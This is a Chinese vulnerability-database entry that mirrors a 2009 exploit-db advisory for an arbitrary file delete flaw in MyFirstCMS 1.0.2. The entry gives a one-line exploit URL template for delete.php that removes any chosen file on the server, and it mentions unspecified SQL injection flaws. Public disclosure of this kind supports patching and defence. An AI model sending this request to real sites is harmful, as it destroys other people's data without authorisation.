MyFirstCMS 1.0.2 - Arbitrary File Delete

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057846 漏洞类型
发布时间 2009-05-26 更新时间 2009-05-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8787
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
--+++==========================================================================+++--
--+++========== MyFirstCMS <= 1.0.2 Remote File Delete Vulnerability ==========+++--
--+++==========================================================================+++--


[+] Author   : darkjoker
[+] Site     : http://darkjoker.net23.net
[+] Download : http://ostatic.com/myfirstcms


[+] Short note:
This CMS also has other vulnerabilities, such as SQL Injections, but,
unfortuntaly, who wrote this CMS was a bit an idiot, because declared
functions called, for example, 'try', forgot some ';' or '}' somewhere...
Call me lazy or what you want but I don't want to spend time fixing a CMS
just for code an exploit ...

[+] Exploit: http://hostname/myfirstcms/delete.php?file=[file_to_delete]

# milw0rm.com [2009-05-26]